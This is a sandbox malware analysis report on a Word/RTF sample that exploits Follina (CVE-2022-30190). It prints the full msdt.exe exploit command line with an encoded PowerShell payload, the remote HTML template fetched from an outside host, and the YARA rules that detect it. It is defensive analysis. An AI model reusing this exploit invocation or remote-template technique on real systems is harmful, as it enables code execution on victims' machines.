Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
20220531_180800.rtf

Overview

General Information

Sample Name:20220531_180800.rtf
Analysis ID:639039
MD5:7b9c8e08371550238fbcd7cee1c8087d
SHA1:ff8c9deb358b2d22aa086cf36406461e8e9978b2
SHA256:b93326f795459d836c277730058e9923ab5f9bfbcef32e1c951e4a0d7538f9f5
Infos:

Detection

Follina CVE-2022-30190
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Malicious sample detected (through community Yara rule)
Contains an external reference to another file
Document exploit detected (process start blacklist hit)
Detected suspicious Microsoft Office reference URL
Obfuscated document found, RTF is a DOCX
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Potential document exploit detected (unknown TCP traffic)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

  • System is w10x64
  • WINWORD.EXE (PID: 6340 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • MSOSYNC.EXE (PID: 6532 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)
    • msdt.exe (PID: 7100 cmdline: C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX("powershell -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7AFsAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzAC4ATQBlAHMAcwBhAGcAZQBCAG8AeABdADoAOgBTAGgAbwB3ACgAJwBIAGUAbABsAG8AIABpAHQAcwAgAG0AZQAhACAATQBhAHkAYgBlACAAeQBvAHUAIABjAG8AdQBsAGQAIABsAG8AbwBrACAAYQB0ACAAbQBkAHMAdAA/ACcAKQA7AA=="))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
document.xml.relsSUSP_Doc_WordXMLRels_May22Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190Tobias Michalski, Christian Burkard, Wojciech Cie\305\233lak
  • 0x39:$a1: <Relationships
  • 0x3b9:$a2: TargetMode="External"
  • 0x3b1:$x1: .html!
document.xml.relsINDICATOR_OLE_RemoteTemplateDetects XML relations where an OLE object is refrencing an external target in dropper OOXML documentsditekSHen
  • 0x375:$olerel: relationships/oleObject
  • 0x38e:$target1: Target="http
  • 0x3b9:$mode: TargetMode="External

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\8EA7015A.htmMAL_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190Tobias Michalski, Christian Burkard
    • 0x113c:$re1: location.href = "ms-msdt:
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\8EA7015A.htmJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\th1s[1].htmMAL_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190Tobias Michalski, Christian Burkard
      • 0x113c:$re1: location.href = "ms-msdt:
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\th1s[1].htmJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F640E46C.htmMAL_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190Tobias Michalski, Christian Burkard
        • 0x113c:$re1: location.href = "ms-msdt:
        Click to see the 1 entries

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000009.00000002.553703750.0000000003140000.00000004.00000020.00020000.00000000.sdmpSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190Nasreddine Bencherchali, Christian Burkard
        • 0x1c84:$sa1: msdt.exe
        • 0x1cc0:$sa1: msdt.exe
        • 0x2188:$sa1: msdt.exe
        • 0x38b5:$sa1: msdt.exe
        • 0x1d98:$sb2: IT_BrowseForFile=
        • 0x3921:$sb2: IT_BrowseForFile=
        00000009.00000002.554020054.00000000033A0000.00000004.00000020.00020000.00000000.sdmpSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190Nasreddine Bencherchali, Christian Burkard
        • 0x2890:$sa1: msdt.exe
        • 0x2964:$sb2: IT_BrowseForFile=
        00000009.00000002.553580729.0000000000A90000.00000004.00000020.00020000.00000000.sdmpSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190Nasreddine Bencherchali, Christian Burkard
        • 0x22d0:$sa1: msdt.exe
        • 0x230c:$sa1: msdt.exe
        • 0x27d4:$sa1: msdt.exe
        • 0x23e4:$sb2: IT_BrowseForFile=
        00000009.00000002.553717920.0000000003148000.00000004.00000020.00020000.00000000.sdmpSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190Nasreddine Bencherchali, Christian Burkard
        • 0x2618:$sa1: msdt.exe
        • 0x60a8:$sa1: msdt.exe
        • 0x18c06:$sa1: msdt.exe
        • 0x16c28:$sb2: IT_BrowseForFile=
        Process Memory Space: msdt.exe PID: 7100SUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190Nasreddine Bencherchali, Christian Burkard
        • 0xccd:$sa1: msdt.exe
        • 0x32ec:$sa1: msdt.exe
        • 0x488e:$sa1: msdt.exe
        • 0x8d4c:$sa1: msdt.exe
        • 0xbd02:$sa1: msdt.exe
        • 0x12fd5:$sa1: msdt.exe
        • 0x12ff2:$sa1: msdt.exe
        • 0x13255:$sa1: msdt.exe
        • 0x139b6:$sa1: msdt.exe
        • 0x14d9a:$sa1: msdt.exe
        • 0x14db7:$sa1: msdt.exe
        • 0x14ddb:$sa1: msdt.exe
        • 0x14dfb:$sa1: msdt.exe
        • 0x14e70:$sa1: msdt.exe
        • 0x1c10e:$sa1: msdt.exe
        • 0x1f0c4:$sa1: msdt.exe
        • 0x22589:$sa1: msdt.exe
        • 0x24ae4:$sa1: msdt.exe
        • 0x27a9a:$sa1: msdt.exe
        • 0x2af61:$sa1: msdt.exe
        • 0x2f9c8:$sa1: msdt.exe

        Sigma Signatures

        No Sigma rule has matched

        Snort Signatures

        No Snort rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        Exploits

        barindex
        Yara detected Microsoft Office Exploit Follina CVE-2022-30190
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\8EA7015A.htm, type: DROPPED
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\th1s[1].htm, type: DROPPED
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F640E46C.htm, type: DROPPED
        Detected suspicious Microsoft Office reference URL
        Source: document.xml.relsExtracted files from sample: https://cyberleague.co/th1s.html!
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
        Source: unknownHTTPS traffic detected: 13.250.15.191:443 -> 192.168.2.3:49741 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.250.15.191:443 -> 192.168.2.3:49747 version: TLS 1.2

        Software Vulnerabilities

        barindex
        Document exploit detected (process start blacklist hit)
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe
        Source: global trafficTCP traffic: 192.168.2.3:49741 -> 13.250.15.191:443
        Source: global trafficDNS query: name: cyberleague.co
        Source: global trafficTCP traffic: 192.168.2.3:49741 -> 13.250.15.191:443
        Source: global trafficHTTP traffic detected: GET /th1s.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: cyberleague.coConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /th1s.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: cyberleague.coIf-Modified-Since: Wed, 01 Jun 2022 14:36:34 GMTIf-None-Match: "13e4-5e063d0e1ca1e"Connection: Keep-Alive
        Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
        Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
        Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://api.aadrm.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://api.aadrm.com/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://api.cortana.ai
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://api.diagnostics.office.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://api.microsoftstream.com/api/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://api.office.net
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://api.onedrive.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://apis.live.net/v5.0/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://augloop.office.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://augloop.office.com/v2
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://cdn.entity.
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://clients.config.office.net/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://config.edge.skype.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://cortana.ai
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://cortana.ai/api
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://cr.office.com
        Source: ~WRS{12FCD2A2-2042-4667-BB36-257049CA1904}.tmp.0.drString found in binary or memory: https://cyberleague.co/th1s.html
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://dataservice.o365filtering.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://dataservice.o365filtering.com/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://dev.cortana.ai
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://devnull.onenote.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://directory.services.
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://edu-mathreco-prod.trafficmanager.net
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://edu-mathsolver-prod.trafficmanager.net
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://enrichment.osi.office.net/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://graph.ppe.windows.net
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://graph.ppe.windows.net/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://graph.windows.net
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://graph.windows.net/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://incidents.diagnostics.office.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://invites.office.com/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://lifecycle.office.com
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://login.microsoftonline.com/
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://login.windows.local
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
        Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
